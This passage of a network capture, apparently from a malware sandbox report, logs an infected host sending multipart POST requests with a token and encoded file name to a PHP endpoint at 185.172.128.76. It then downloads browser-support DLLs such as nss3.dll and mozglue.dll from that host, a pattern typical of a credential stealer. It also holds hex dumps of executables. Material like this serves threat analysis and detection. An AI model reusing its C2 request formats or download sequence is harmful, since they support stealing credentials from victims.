60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.831984043 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                                                                                            Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.832016945 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                                                                                            Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.832024097 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                                                                                            Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.832057953 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                                                                                            Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                            Apr 25, 2024 09:04:05.640358925 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 4599
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:05.980470896 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:05 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:06.070965052 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 1451
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:06.412611961 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:06 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:06.431207895 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="file"------DAKEBAKFHCFHIEBFBAFB--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:06.774545908 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:06 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:07.069798946 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----KJDGDBFBGIDGIEBGHCGI
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 359
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 44 47 44 42 46 42 47 49 44 47 49 45 42 47 48 43 47 49 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------KJDGDBFBGIDGIEBGHCGIContent-Disposition: form-data; name="file"------KJDGDBFBGIDGIEBGHCGI--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:07.410007954 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:07 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:09.934329033 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:10.248081923 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:10 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 685392
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:11.367708921 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:11.682141066 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:11 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:12.217967033 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:12.537194967 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:12 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                            Apr 25, 2024 09:04:12.906718016 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:13.226200104 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:13 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                            ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                            Accept-Ranges: bytes
